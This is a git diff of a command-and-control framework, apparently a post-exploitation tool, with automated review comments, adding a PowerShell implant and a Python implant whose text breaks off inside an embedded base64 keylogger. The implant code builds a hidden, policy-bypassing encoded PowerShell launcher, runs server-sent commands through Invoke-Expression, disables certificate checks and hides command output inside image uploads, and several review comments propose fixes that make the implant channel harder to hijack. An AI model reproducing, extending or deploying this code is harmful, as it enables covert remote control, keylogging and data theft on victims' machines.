diff --git a/C2Server.py b/C2Server.py
index c6269f4..6b79768 100644
--- a/C2Server.py
+++ b/C2Server.py
@@ -226,7 +226,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 cookieVal = (s.cookieHeader).replace("SessionID=","")
 post_data = s.rfile.read(content_length)
 logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(s.path), str(s.headers), post_data)
- now = datetime.datetime.now()
 result = get_implants_all()
 for i in result:
@@ -239,6 +238,18 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 if RandomURI in s.path and cookieVal:
 update_implant_lastseen(now.strftime("%m/%d/%Y %H:%M:%S"),RandomURI)
 decCookie = decrypt(encKey, cookieVal)
+ if decCookie.startswith("Error"):
+ print (Colours.RED)
+ print ("The multicmd errored: ")
+ print (decrypt_bytes_gzip(encKey, post_data[1500:]))
+ print (Colours.GREEN)
+ s.send_response(200)
+ s.send_header("Content-type", "text/html")
+ s.end_headers()
+ s.wfile.write(default_response())
+ return
+ taskId = str(int(decCookie.strip('\x00')))
+ executedCmd = get_cmd_from_task_id(taskId)
 print (Colours.GREEN)
 print ("Command returned against implant %s on host %s\\%s @ %s (%s)" % (implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
 #print decCookie,Colours.END
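Review bot: The new side still evaluates `now.strftime(...)` in the `update_implant_lastseen(...)` call and in the "Command returned" print of the next hunk, but this hunk deletes the only `now = datetime.datetime.now()` visible here, so unless do_POST assigns `now` earlier (outside the hunk) the first implant POST raises NameError. Either keep `now = datetime.datetime.now()` just before `result = get_implants_all()`, or assign it right after the `if RandomURI in s.path and cookieVal:` check where it is actually consumed. The enclosing do_POST method starts before this hunk.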
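Review bot: The `Error` branch records nothing in the Tasks table, so a multicmd that fails on the implant leaves its row with empty Output/CompletedTime and only the operator console ever sees the decrypted error text; the implant sends the literal cookie "Error" so there is no task id to update, but the failure should at least go through `logging.error("multicmd error from %s: %s", RandomURI, decrypt_bytes_gzip(encKey, post_data[1500:]))` rather than a bare print, and `post_data[1500:]` is empty for a short body, in which case decrypt_bytes_gzip raises inside this unguarded branch. Below it, `int(decCookie.strip('\x00'))` raises ValueError for any cookie that is not a bare task number (an older implant still sending the command text, or a body decrypted under the wrong key); that int() is also what keeps the `%s`-formatted SQL in get_cmd_from_task_id safe, so keep it but wrap it as `except ValueError: return` after sending the default response instead of letting it escape. If this block sits inside the try whose `finally:` this commit adds further down, the early `return` also fires a second `s.send_response(200)` on the same connection; the try's opening line is outside the hunk, so that needs confirming.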
@@ -246,52 +257,91 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
 outputParsed = outputParsed.rstrip()
- if "ModuleLoaded" in decCookie:
+ if "loadmodule" in executedCmd:
 print ("Module loaded sucessfully")
- insert_completedtask(RandomURI, decCookie, "Module loaded sucessfully", "")
- if "get-screenshot" in decCookie.lower() or "screencapture" in decCookie.lower():
+ update_task(taskId, "Module loaded sucessfully")
+ if "get-screenshot" in executedCmd.lower() or "screencapture" in executedCmd.lower():
 try:
 decoded = base64.b64decode(outputParsed)
 filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_"+randomuri())
 output_file = open('%s%s.png' % (DownloadsDirectory,filename), 'wb')
 print ("Screenshot captured: %s%s.png" % (DownloadsDirectory,filename))
- insert_completedtask(RandomURI, decCookie, "Screenshot captured: %s%s.png" % (DownloadsDirectory,filename), "")
+ update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory,filename))
 output_file.write(decoded)
 output_file.close()
 except Exception as e:
- insert_completedtask(RandomURI, decCookie, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!", "")
+ update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
 print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
- elif (decCookie.lower().startswith("$shellcode64")) or (decCookie.lower().startswith("$shellcode64")):
- insert_completedtask(RandomURI, decCookie, "Upload shellcode complete", "")
+ # What should this be now?
+ elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
+ update_task(taskId, "Upload shellcode complete")
 print ("Upload shellcode complete")
- elif (decCookie.lower().startswith("run-exe core.program core inject-shellcode")):
- insert_completedtask(RandomURI, decCookie, "Upload shellcode complete", "")
+ elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")):
+ update_task(taskId, "Upload shellcode complete")
 print (outputParsed)
- elif "download-file" in decCookie.lower():
+ elif "download-file" in executedCmd.lower():
 try:
 rawoutput = decrypt_bytes_gzip(encKey, (post_data[1500:]))
- filename = decCookie.lower().replace("download-file ","")
+ filename = executedCmd.lower().replace("download-file ","")
+ filename = filename.replace("-source ","")
 filename = filename.replace("..","")
+ filename = filename.replace("'","")
+ filename = filename.replace('"',"")
 filename = filename.rsplit('/', 1)[-1]
 filename = filename.rsplit('\\', 1)[-1]
 filename = filename.rstrip('\x00')
- chunkNumber = rawoutput[:5]
- totalChunks = rawoutput[5:10]
- print ("Download file part %s of %s : %s" % (chunkNumber,totalChunks,filename))
- insert_completedtask(RandomURI, decCookie, "Download file part %s of %s : %s" % (chunkNumber,totalChunks,filename), "")
- output_file = open('%s/downloads/%s' % (ROOTDIR,filename), 'a')
- output_file.write(rawoutput[10:])
- output_file.close()
+ original_filename = filename
+ if rawoutput.startswith("Error"):
+ print("Error downloading file: ")
+ print rawoutput
+ else:
+ chunkNumber = rawoutput[:5]
+ totalChunks = rawoutput[5:10]
+ if (chunkNumber == "00001") and os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename)):
+ counter = 1
+ while(os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename))):
+ if '.' in filename:
+ filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
+ else:
+ filename = original_filename + '-' + str(counter)
+ counter+=1
+ if (chunkNumber != "00001"):
+ counter = 1
+ if not os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename)):
+ print("Error trying to download part of a file to a file that does not exist: %s" % filename)
+ while(os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename))):
+ # First find the 'next' file would be downloaded to
+ if '.' in filename:
+ filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
+ else:
+ filename = original_filename + '-' + str(counter)
+ counter+=1
+ if counter != 2:
+ # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
+ if '.' in filename:
+ filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
+ else:
+ filename = original_filename + '-' + str(counter)
+ else:
+ filename = original_filename
+ print ("Download file part %s of %s to: %s" % (chunkNumber,totalChunks,filename))
+ update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber,totalChunks,filename))
+ output_file = open('%s/downloads/%s' % (ROOTDIR,filename), 'a')
+ output_file.write(rawoutput[10:])
+ output_file.close()
 except Exception as e:
- insert_completedtask(RandomURI, decCookie, "Error downloading file %s " % e, "")
+ update_task(taskId, "Error downloading file %s " % e)
 print ("Error downloading file %s " % e)
 else:
- insert_completedtask(RandomURI, decCookie, outputParsed, "")
+ update_task(taskId, outputParsed)
 print (Colours.GREEN)
 print (outputParsed + Colours.END)
 except Exception as e:
 e = ""
+ # print e
+ # traceback.print_exc()
+ finally:
 s.send_response(200)
 s.send_header("Content-type", "text/html")
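Review bot: The continuation branch (`if (chunkNumber != "00001"):`) picks the wrong file once a name has been suffixed: the while loop leaves `counter` one past the first free slot, so with `x.txt` and `x-1.txt` on disk it exits with counter == 3 and the `if counter != 2:` block then builds `x-3.txt`, a file that does not exist, and the later `open(..., 'a')` silently starts a new partial file instead of appending to `x-1.txt`; when nothing is on disk (counter == 1) the "does not exist" message is printed but the write still goes ahead, to `x-1.txt`. The in-progress file is two steps back from `counter`, so the suffix should be `str(counter - 2)`, with counter == 1 left as a logged failure and counter == 2 meaning the unsuffixed name, as below. Two implants downloading files with the same basename will still interleave chunks under this latest-existing-file heuristic; tracking the target name per taskId (the Tasks row already exists) would remove that ambiguity, but that is a larger change. The enclosing do_POST method starts before this hunk.
```python
if (chunkNumber != "00001"):
    counter = 1
    while(os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename))):
        # … unchanged: advance filename to original_filename-<counter>, counter += 1 …
    # the loop stops one past the first free name, so the file being
    # continued is two steps back: counter == 1 means nothing is on disk,
    # counter == 2 the unsuffixed name, otherwise original-(counter-2)
    if counter == 1:
        print("Error trying to download part of a file to a file that does not exist: %s" % filename)
    elif counter == 2:
        filename = original_filename
    else:
        suffix = '-' + str(counter - 2)
        if '.' in original_filename:
            filename = original_filename[:original_filename.rfind('.')] + suffix + original_filename[original_filename.rfind('.'):]
        else:
            filename = original_filename + suffix
# … unchanged: print, update_task, append to downloads/<filename> …
```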
diff --git a/C2Viewer.py b/C2Viewer.py
index ba7f092..628761e 100644
--- a/C2Viewer.py
+++ b/C2Viewer.py
@@ -23,7 +23,7 @@ print (logopic)
 print (Colours.END + "")
 try:
- taskid = get_seqcount("CompletedTasks") + 1
+ taskid = get_seqcount("Tasks") + 1
 except Exception as e:
 user = "None"
 taskid = 1
@@ -64,7 +64,7 @@ while(1):
 user = "None"
 try:
- completedtask = get_completedtasksbyid(taskid)
+ completedtask = get_tasksbyid(taskid)
 hostinfo = get_hostinfo(completedtask[2])
 now = datetime.datetime.now()
 if hostinfo:
diff --git a/DB.py b/DB.py
index 8d6b021..283a0e9 100644
--- a/DB.py
+++ b/DB.py
@@ -30,15 +30,16 @@ def initializedb():
 TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
 Task TEXT);"""
- create_completedtasks = """CREATE TABLE CompletedTasks (
- CompletedTaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
- TaskID TEXT,
+ create_tasks = """CREATE TABLE Tasks (
+ TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
 RandomURI TEXT,
 Command TEXT,
 Output TEXT,
- Prompt TEXT);"""
+ User TEXT,
+ SentTime TEXT,
+ CompletedTime TEXT);"""
- create_tasks = """CREATE TABLE NewTasks (
+ create_newtasks = """CREATE TABLE NewTasks (
 TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
 RandomURI TEXT,
 Command TEXT);"""
@@ -97,8 +98,8 @@ def initializedb():
 if conn is not None:
 c.execute(create_implants)
 c.execute(create_autoruns)
- c.execute(create_completedtasks)
 c.execute(create_tasks)
+ c.execute(create_newtasks)
 c.execute(create_creds)
 c.execute(create_urls)
 c.execute(create_c2server)
@@ -365,15 +366,29 @@ def new_implant(RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen,
 c.execute("INSERT INTO Implants (RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, PID, Proxy, Arch, Domain, Alive, Sleep, ModsLoaded, Pivot, Label) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, PID, Proxy, Arch, Domain, Alive, Sleep, ModsLoaded, Pivot, Label))
 conn.commit()
-def insert_completedtask(randomuri, command, output, prompt):
+def insert_task(randomuri, command, user):
 now = datetime.datetime.now()
- TaskID = now.strftime("%m/%d/%Y %H:%M:%S")
+ sent_time = now.strftime("%m/%d/%Y %H:%M:%S")
 conn = sqlite3.connect(DB)
 conn.text_factory = str
 conn.row_factory = sqlite3.Row
 c = conn.cursor()
- c.execute("INSERT INTO CompletedTasks (TaskID, RandomURI, Command, Output, Prompt) VALUES (?, ?, ?, ?, ?)", (TaskID, randomuri, command, output, prompt))
+ if user is None:
+ user = ""
+ c.execute("INSERT INTO Tasks (RandomURI, Command, Output, User, SentTime, CompletedTime) VALUES (?, ?, ?, ?, ?, ?)", (randomuri, command, "", user, sent_time, ""))
 conn.commit()
+ return c.lastrowid
+
+def update_task(taskId, output):
+ now = datetime.datetime.now()
+ completedTime = now.strftime("%m/%d/%Y %H:%M:%S")
+ conn = sqlite3.connect(DB)
+ conn.text_factory = str
+ conn.row_factory = sqlite3.Row
+ c = conn.cursor()
+ c.execute("UPDATE Tasks SET Output=?, CompletedTime=? WHERE TaskID=%s" % taskId, (output, completedTime))
+ conn.commit()
+ return c.lastrowid
 def update_item(column, table, value, wherecolumn=None, where=None):
 conn = sqlite3.connect(DB)
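Review bot: `update_task` interpolates `taskId` straight into the SQL (`"... WHERE TaskID=%s" % taskId`) while the other two values go through placeholders; the only caller visible in this commit passes an int()-validated id, but the helper itself is injectable with any other string, so bind it as `c.execute("UPDATE Tasks SET Output=?, CompletedTime=? WHERE TaskID=?", (output, completedTime, taskId))`. The `return c.lastrowid` after an UPDATE carries no information (lastrowid reflects the last INSERT on the cursor), whereas `return c.rowcount` would let C2Server notice when an implant reports against a task id that has no row. The connection is not closed, matching the rest of the file, but a `with conn:` block would commit and release it in one go.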
@@ -395,22 +410,22 @@ def get_implantbyid(id):
 else:
 return None
-def get_completedtasks():
+def get_tasks():
 conn = sqlite3.connect(DB)
 conn.row_factory = sqlite3.Row
 c = conn.cursor()
- c.execute("SELECT * FROM CompletedTasks")
+ c.execute("SELECT * FROM Tasks")
 result = c.fetchall()
 if result:
 return result
 else:
 return None
-def get_completedtasksbyid(id):
+def get_tasksbyid(id):
 conn = sqlite3.connect(DB)
 conn.row_factory = sqlite3.Row
 c = conn.cursor()
- c.execute("SELECT * FROM CompletedTasks WHERE CompletedTaskID=%s" % id)
+ c.execute("SELECT * FROM Tasks WHERE CompletedTaskID=%s" % id)
 result = c.fetchone()
 if result:
 return result
@@ -461,6 +476,17 @@ def get_dfheader():
 else:
 return None
+def get_cmd_from_task_id(taskId):
+ conn = sqlite3.connect(DB)
+ conn.row_factory = sqlite3.Row
+ c = conn.cursor()
+ c.execute("SELECT Command FROM Tasks WHERE TaskId=%s" % taskId)
+ result = str(c.fetchone()[0])
+ if result:
+ return result
+ else:
+ return None
+
 def get_defaultuseragent():
 conn = sqlite3.connect(DB)
 conn.row_factory = sqlite3.Row
diff --git a/Files/PSImplant-Core.ps1 b/Files/PSImplant-Core.ps1
new file mode 100644
index 0000000..bf8435d
--- /dev/null
+++ b/Files/PSImplant-Core.ps1
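Review bot: `get_tasksbyid` now queries `Tasks WHERE CompletedTaskID=%s`, but the Tasks table this same commit creates in initializedb has no CompletedTaskID column (its key is TaskID), so every call raises sqlite3.OperationalError and the C2Viewer loop that calls it will hit its except path on each task. The query should be `c.execute("SELECT * FROM Tasks WHERE TaskID=?", (id,))`, which also drops the `%s` string formatting that the rest of this function family uses for ids.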
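Review bot: In `get_cmd_from_task_id`, `str(c.fetchone()[0])` raises TypeError when no row matches, and because str() runs before the `if result:` check a missing row can never reach the `return None` branch; the helper is called from the POST handler with a task id taken from the implant's cookie, so an unknown id currently blows up the handler rather than being reported. Replace the fetch with `c.execute("SELECT Command FROM Tasks WHERE TaskID=?", (taskId,))`, `row = c.fetchone()`, `return str(row[0]) if row else None`, which also removes the `%s` interpolation of the id into SQL.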
@@ -0,0 +1,272 @@ +$key="%s" +$global:sleeptime = '%s' + +$payloadclear = @" +[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} +`$s="$s" +`$sc="$sc" +function DEC {${function:DEC}} +function ENC {${function:ENC}} +function CAM {${function:CAM}} +function Get-Webclient {${function:Get-Webclient}} +function Primer {${function:primer}} +`$primer = primer +if (`$primer) {`$primer| iex} else { +start-sleep 1800 +primer | iex } +"@ + +$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear) +$CompressedStream = New-Object IO.MemoryStream +$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) +$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) +$DeflateStream.Dispose() +$CompressedScriptBytes = $CompressedStream.ToArray() +$CompressedStream.Dispose() +$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) +$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" +$UnicodeEncoder = New-Object System.Text.UnicodeEncoding +$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript)) +$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)" +$payload = $payloadraw -replace "`n", "" + +function GetImgData($cmdoutput) { + $icoimage = @(%s) + + try {$image = $icoimage|get-random}catch{} + + function randomgen + { + param ( + [int]$Length + ) + $set = "...................@..........................Tyscf".ToCharArray() + $result = "" + for ($x = 0; $x -lt $Length; $x++) + {$result += $set | Get-Random} + return $result + } + $imageBytes = [Convert]::FromBase64String($image) + $maxbyteslen = 1500 + $maxdatalen = 1500 + ($cmdoutput.Length) + $imagebyteslen = $imageBytes.Length + 
$paddingbyteslen = $maxbyteslen - $imagebyteslen + $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen)) + $ImageBytesFull = New-Object byte[] $maxdatalen + [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length) + [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length) + [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length ) + $ImageBytesFull +} +function Create-AesManagedObject($key, $IV) { + try { + $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged" + } catch { + $aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider" + } + $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC + $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros + $aesManaged.BlockSize = 128 + $aesManaged.KeySize = 256 + if ($IV) { + if ($IV.getType().Name -eq "String") { + $aesManaged.IV = [System.Convert]::FromBase64String($IV) + } + else { + $aesManaged.IV = $IV + } + } + if ($key) { + if ($key.getType().Name -eq "String") { + $aesManaged.Key = [System.Convert]::FromBase64String($key) + } + else { + $aesManaged.Key = $key + } + } + $aesManaged +} + +function Encrypt-String($key, $unencryptedString) { + $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString) + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); + [byte[]] $fullData = $aesManaged.IV + $encryptedData + #$aesManaged.Dispose() + [System.Convert]::ToBase64String($fullData) +} +function Encrypt-Bytes($key, $bytes) { + [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream + $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) + $gzipStream.Write( $bytes, 0, $bytes.Length ) + $gzipStream.Close() + $bytes = 
$output.ToArray() + $output.Close() + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) + [byte[]] $fullData = $aesManaged.IV + $encryptedData + $fullData +} +function Decrypt-String($key, $encryptedStringWithIV) { + $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) + $IV = $bytes[0..15] + $aesManaged = Create-AesManagedObject $key $IV + $decryptor = $aesManaged.CreateDecryptor(); + $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16); + #$aesManaged.Dispose() + [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0) +} +function Encrypt-String2($key, $unencryptedString) { + $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString) + $CompressedStream = New-Object IO.MemoryStream + $DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress) + $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length) + $DeflateStream.Dispose() + $bytes = $CompressedStream.ToArray() + $CompressedStream.Dispose() + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) + [byte[]] $fullData = $aesManaged.IV + $encryptedData + $fullData +} +function Decrypt-String2($key, $encryptedStringWithIV) { + $bytes = $encryptedStringWithIV + $IV = $bytes[0..15] + $aesManaged = Create-AesManagedObject $key $IV + $decryptor = $aesManaged.CreateDecryptor() + $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16) + $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() + $output + 
#[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0) +} + +function Send-Response($Server, $Key, $TaskId, $Data) { + try{ + $eid = Encrypt-String $Key $TaskId + $Output = Encrypt-String2 $Key $Data + $UploadBytes = getimgdata $Output + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null + } catch { + Write-Host "ErrorResponse: " + $error[0] + } +} + +[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} + +$URI= "%s" +$Server = "$s/%s" +$ServerClean = "$sc" +while($true) +{ + $ServerURLS = "$($ServerClean)","$($ServerClean)" + $date = (Get-Date -Format "dd/MM/yyyy") + $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null) + $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null) + if ($killdate -lt $date) {exit} + $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9) + $newsleep = $sleeptimeran|get-random + if ($newsleep -lt 1) {$newsleep = 5} + start-sleep $newsleep + $URLS = %s + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {} + + while($ReadCommand) { + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {} + $error.clear() + try { + if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) { + if ($ReadCommandClear.ToLower().StartsWith("multicmd")) { + $splitcmd = $ReadCommandClear -replace "multicmd","" + $split = $splitcmd -split "!d-3dion@LD!-d" + foreach ($i in $split){ + $id = New-Object System.String($i, 0, 5) + $c = New-Object System.String($i, 5, ($i.Length - 5)) + $i = $c + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + $error.clear() + if 
($i.ToLower().StartsWith("upload-file")) { + try { + $Output = Invoke-Expression $i | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } # $result doesn't appear to be used anywhere? + } catch { + $Output = "ErrorUpload: " + $error[0] + } + Send-Response $Server $key $id $Output + } elseif ($i.ToLower().StartsWith("download-file")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorDownload: " + $error[0] + Send-Response $Server $key $id $Output + } + } elseif ($i.ToLower().StartsWith("loadmodule")) { + try { + $modulename = $i -replace "LoadModule","" + $Output = Invoke-Expression $modulename | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + } catch { + $Output = "ErrorLoadMod: " + $error[0] + } + Send-Response $Server $key $id $Output + } elseif ($i.ToLower().StartsWith("get-screenshotallwindows")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorScreenshotAllWindows: " + $error[0] + Send-Response $Server $key $id $Output + } + } elseif ($i.ToLower().StartsWith("get-webpage")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorGetWebpage: " + $error[0] + Send-Response $Server $key $id $Output + } + }else { + try { + $Output = Invoke-Expression $i | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + $StdError = ($error[0] | Out-String) + if ($StdError){ + $Output = $Output + $StdError + $error.clear() + } + } catch { + $Output = "ErrorCmd: " + $error[0] + } + Send-Response $Server $key $id $Output + } + } + } + + $ReadCommandClear = $null + $ReadCommand = $null + } + } catch { + $message = $_.Exception.Message + Send-Response $Server $key "Error" $message + } + break + } +} \ No newline at end of file 
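Review bot: Nothing on the tasking path authenticates what reaches `Invoke-Expression`: `Create-AesManagedObject` sets up AES-CBC with `PaddingMode::Zeros` and neither `Encrypt-String` nor `Decrypt-String` adds or checks a MAC, while `ServerCertificateValidationCallback = {$true}` (set both in `$payloadclear` and at top level) accepts any TLS certificate, so a party on the network path can present its own certificate and, because the IV is the first 16 bytes of the message, flip chosen bits in the first plaintext block of a command before it is executed. Verifying an HMAC over IV||ciphertext in `Decrypt-String` before decrypting (the server would need the matching change), or at least pinning the expected certificate thumbprint in the callback instead of returning `$true`, closes that gap. Separately, the `catch` at the bottom reports failures with `Send-Response $Server $key "Error" $message`, so the server cannot attribute the error to a task id; sending `"Error" + $id` would let it update the right Tasks row. `$s` and `$sc` are referenced but not defined in this file, presumably filled in by the template that wraps it.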
diff --git a/Files/PyImplant-Core.py b/Files/PyImplant-Core.py new file mode 100644 index 0000000..deb3a3c --- /dev/null +++ b/Files/PyImplant-Core.py 
@@ -0,0 +1,215 @@ +import urllib2, os, subprocess, re, datetime, time, base64, string, random +hh = '%s' +timer = %s +icoimage = [%s] +urls = [%s] +kd=time.strptime("%s","%%d/%%m/%%Y") +useragent = "" +imbase = "%s" + +def keylog(): + # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py + import os,time,base64,subprocess,uuid + filename = "/tmp/%%s" %% uuid.uuid4().hex + b64logger = "aW1wb3J0IG9zLHRpbWUKZmlsZW5hbWUgPSAiUkVQTEFDRU1FIgpvdXRwdXQgPSBvcy5wb3BlbignZWNobyAicmVxdWlyZSBcJ2Jhc2U2NFwnO2V2YWwoQmFzZTY0LmRlY29kZTY0KFwnWkdWbUlISjFZbmxmTVY4NVgyOXlYMmhwWjJobGNqOE5DaUFnVWxWQ1dWOVdSVkpUU1U5T0xuUnZYMllnUGowZ01TNDVJQ1ltSUZKVlFsbGZWa1ZTVTBsUFRpNTBiMTltUERJdU13MEtaVzVrRFFwa1pXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNCU1ZVSlpYMVpGVWxOSlQwNHVkRzlmWmlBK1BTQXlMak1OQ21WdVpBMEtjbVZ4ZFdseVpTQW5kR2h5WldGa0p3MEtjbVZ4ZFdseVpTQW5abWxrWkd4bEp5QnBaaUJ5ZFdKNVh6SmZNMTl2Y2w5b2FXZG9aWEkvRFFweVpYRjFhWEpsSUNkbWFXUmtiR1V2YVcxd2IzSjBKeUJwWmlCeWRXSjVYekpmTTE5dmNsOW9hV2RvWlhJL0RRcHlaWEYxYVhKbElDZGtiQ2NnYVdZZ2JtOTBJSEoxWW5sZk1sOHpYMjl5WDJocFoyaGxjajhOQ25KbGNYVnBjbVVnSjJSc0wybHRjRzl5ZENjZ2FXWWdibTkwSUhKMVlubGZNbDh6WDI5eVgyaHBaMmhsY2o4TkNrbHRjRzl5ZEdWeUlEMGdhV1lnWkdWbWFXNWxaRDhvUkV3Nk9rbHRjRzl5ZEdWeUtTQjBhR1Z1SUdWNGRHVnVaQ0JFVERvNlNXMXdiM0owWlhJZ1pXeHphV1lnWkdWbWFXNWxaRDhvUm1sa1pHeGxPanBKYlhCdmNuUmxjaWtnZEdobGJpQmxlSFJsYm1RZ1JtbGtaR3hsT2pwSmJYQnZjblJsY2lCbGJITmxJRVJNT2pwSmJYQnZjblJoWW14bElHVnVaQTBLWkdWbUlHMWhiR3h2WTNNb2MybDZaU2tOQ2lBZ2FXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNBZ0lFWnBaR1JzWlRvNlVHOXBiblJsY2k1dFlXeHNiMk1vYzJsNlpTa05DaUFnWld4emFXWWdjblZpZVY4eFh6bGZiM0pmYUdsbmFHVnlQeUFOQ2lBZ0lDQkVURG82UTFCMGNpNXRZV3hzYjJNb2MybDZaU2tOQ2lBZ1pXeHpaUTBLSUNBZ0lFUk1PanB0WVd4c2IyTW9jMmw2WlNrTkNpQWdaVzVrRFFwbGJtUU5DbWxtSUc1dmRDQnlkV0o1WHpGZk9WOXZjbDlvYVdkb1pYSS9EUW9nSUcxdlpIVnNaU0JFVEEwS0lDQWdJRzF2WkhWc1pTQkpiWEJ2Y25SaFlteGxEUW9nSUNBZ0lDQmtaV1lnYldWMGFHOWtYMjFwYzNOcGJtY29iV1YwYUN3Z0ttRnlaM
